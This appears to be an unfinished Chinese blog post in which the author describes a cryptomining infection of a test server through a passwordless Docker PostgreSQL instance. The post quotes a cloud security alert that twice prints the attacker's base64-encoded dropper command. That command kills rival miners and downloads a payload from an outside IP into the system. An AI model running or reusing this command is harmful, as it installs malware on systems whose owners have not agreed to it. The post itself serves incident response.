服務(wù)器被挖礦攻擊了【問題分析待完善】

今天早上一大早,收到阿里云短信,說我的測試服務(wù)器: “存在挖礦活動” 。
1. 問題查看
進(jìn)入控制臺,查看監(jiān)控,發(fā)現(xiàn)CPU 100%了,當(dāng)時忘記截圖了,在安全告警處理列表,出現(xiàn)了幾列

圖一

圖二

圖三

2. 問題處理
2.1 殺掉進(jìn)程
top查看占比高的進(jìn)程殺掉,過一段時間觀察,是否會自己重啟(我的殺掉之后,未重啟)

2.2 找到程序備份,移除
找到木馬文件路徑,關(guān)鍵詞查詢:find / -name 'memfd' ,找到路徑:/usr/src/linux-headers-5.15.0-117/tools/testing/...
備份該文件,并移除

2.3 找到漏洞的缺口
根據(jù)圖三告警詳情,發(fā)現(xiàn)是通過postgresql進(jìn)入的攻擊,為什么postgresql存在該漏洞呢? 排查發(fā)現(xiàn),docker 安裝的postgresql,登錄密碼未生效,不需要密碼也能連接。攻擊者通過連接postgresql,進(jìn)行了木馬命令的寫入,是典型的 “系統(tǒng)命令注入攻擊” ,具體的空了可以好好了解下。以下是阿里云分析的命令記錄

數(shù)據(jù)來源:進(jìn)程啟動觸發(fā)檢測
告警原因:該命令行存在高度可疑的編碼特征。
用戶名 : lxd
命令行:
sh -c echo "a2lsbCAtOSAkKHBncmVwIHpzdmMpICQocGdyZXAgcGRlZmVuZGVyZCkgJChwZ3JlcCB1cGRhdGVjaGVja2VyZCkgJChwZ3JlcCBraW5zaW5nKSAkKHBncmVwIGtkZXZ0bXBmc2kpOwoKZnVuY3Rpb24gX19jdXJsKCkgewoJcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQoJRE9DPS8ke3BhdGgvLyAvL30KCUhPU1Q9JHtzZXJ2ZXIvLzoqfQoJUE9SVD0ke3NlcnZlci8vKjp9CglbWyB4IiR7SE9TVH0iID09IHgiJHtQT1JUfSIgXV0gJiYgUE9SVD04MAoKCWV4ZWMgMzw+L2Rldi90Y3AvJHtIT1NUfS8kUE9SVAoJZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKCSh3aGlsZSByZWFkIGxpbmU7IGRvCgkJW1sgIiRsaW5lIiA9PSAkJ1xyJyBdXSAmJiBicmVhawoJZG9uZSAmJiBjYXQpIDwmMwoJZXhlYyAzPiYtCn0KCmlmIFsgLXggIiQoY29tbWFuZCAtdiBjdXJsKSIgXTsgdGhlbgoJY3VybCAta3NTIDEzMi4xNDguMTQ4LjE5MDo0NTM0OS9pS3RreFJGYmRHR0RaY2lBT1FPSmNJVUxzRWZtV2MgLW8gcG9zdG1hc3RlcgplbGlmIFsgLXggIiQoY29tbWFuZCAtdiB3Z2V0KSIgXTsgdGhlbgoJd2dldCAtcSAtT3Bvc3RtYXN0ZXIgMTMyLjE0OC4xNDguMTkwOjQ1MzQ5L2lLdGt4UkZiZEdHRFpjaUFPUU9KY0lVTHNFZm1XYwplbHNlCglfX2N1cmwgaHR0cDovLzEzMi4xNDguMTQ4LjE5MDo0NTM0OS9pS3RreFJGYmRHR0RaY2lBT1FPSmNJVUxzRWZtV2MgPiBwb3N0bWFzdGVyIDsKZmk7" | base64 -d | bash 2>&1 | sed -e "s/\x0D//g" 2>&1  2>&1 || exit 0
進(jìn)程路徑:/bin/dash
進(jìn)程ID:143003
父進(jìn)程文件路徑:/usr/lib/postgresql/12/bin/postgres
父進(jìn)程ID:142938
進(jìn)程鏈: -[30395]  /usr/bin/containerd

    -[93560]  /usr/bin/containerd-shim-runc-v2 -namespace moby -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 3018dcfe1b9ffbcdf45f11660bbdbe368cf66c551260f8020810acc54ba5fb43 start

        -[93569]  /usr/bin/containerd-shim-runc-v2 -namespace moby -id 3018dcfe1b9ffbcdf45f11660bbdbe368cf66c551260f8020810acc54ba5fb43 -address /run/containerd/containerd.sock

            -[93580]  runc --root /var/run/docker/runtime-runc/moby --log /run/containerd/io.containerd.runtime.v2.task/moby/3018dcfe1b9ffbcdf45f11660bbdbe368cf66c551260f8020810acc54ba5fb43/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/moby/3018dcfe1b9ffbcdf45f11660bbdbe368cf66c551260f8020810acc54ba5fb43 --pid-file /run/containerd/io.containerd.runtime.v2.task/moby/3018dcfe1b9ffbcdf45f11660bbdbe368cf66c551260f8020810acc54ba5fb43/init.pid --console-socket /tmp/pty3908976864/pty.sock 3018dcfe1b9ffbcdf45f11660bbdbe368cf66c551260f8020810acc54ba5fb43

                -[93587]  runc init

                    -[93598]  runc init

                        -[93599]  postgres

                            -[142938]  postgres

                                -[143003]  sh -c echo "a2lsbCAtOSAkKHBncmVwIHpzdmMpICQocGdyZXAgcGRlZmVuZGVyZCkgJChwZ3JlcCB1cGRhdGVjaGVja2VyZCkgJChwZ3JlcCBraW5zaW5nKSAkKHBncmVwIGtkZXZ0bXBmc2kpOwoKZnVuY3Rpb24gX19jdXJsKCkgewoJcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQoJRE9DPS8ke3BhdGgvLyAvL30KCUhPU1Q9JHtzZXJ2ZXIvLzoqfQoJUE9SVD0ke3NlcnZlci8vKjp9CglbWyB4IiR7SE9TVH0iID09IHgiJHtQT1JUfSIgXV0gJiYgUE9SVD04MAoKCWV4ZWMgMzw+L2Rldi90Y3AvJHtIT1NUfS8kUE9SVAoJZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKCSh3aGlsZSByZWFkIGxpbmU7IGRvCgkJW1sgIiRsaW5lIiA9PSAkJ1xyJyBdXSAmJiBicmVhawoJZG9uZSAmJiBjYXQpIDwmMwoJZXhlYyAzPiYtCn0KCmlmIFsgLXggIiQoY29tbWFuZCAtdiBjdXJsKSIgXTsgdGhlbgoJY3VybCAta3NTIDEzMi4xNDguMTQ4LjE5MDo0NTM0OS9pS3RreFJGYmRHR0RaY2lBT1FPSmNJVUxzRWZtV2MgLW8gcG9zdG1hc3RlcgplbGlmIFsgLXggIiQoY29tbWFuZCAtdiB3Z2V0KSIgXTsgdGhlbgoJd2dldCAtcSAtT3Bvc3RtYXN0ZXIgMTMyLjE0OC4xNDguMTkwOjQ1MzQ5L2lLdGt4UkZiZEdHRFpjaUFPUU9KY0lVTHNFZm1XYwplbHNlCglfX2N1cmwgaHR0cDovLzEzMi4xNDguMTQ4LjE5MDo0NTM0OS9pS3RreFJGYmRHR0RaY2lBT1FPSmNJVUxzRWZtV2MgPiBwb3N0bWFzdGVyIDsKZmk7" | base64 -d | bash 2>&1 | sed -e "s/\x0D//g" 2>&1  2>&1 || exit 0

容器名:postgresql
容器ID:3018dcfe1b9ffbcdf45f11660bbdbe368cf66c551260f8020810acc54ba5fb43
鏡像ID: postgres@sha256:3dc81d3f5988f9e4dda4fa18b769743df01bc4eba3fac2fe60b91a3075f6f4cf
鏡像名: postgres:12.10
容器hostname: 3018dcfe1b9f
容器主ip: xxxx
容器視角進(jìn)程路徑: /proc/93599/root/bin/dash

3. 問題分析
// 待完善 TODO

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容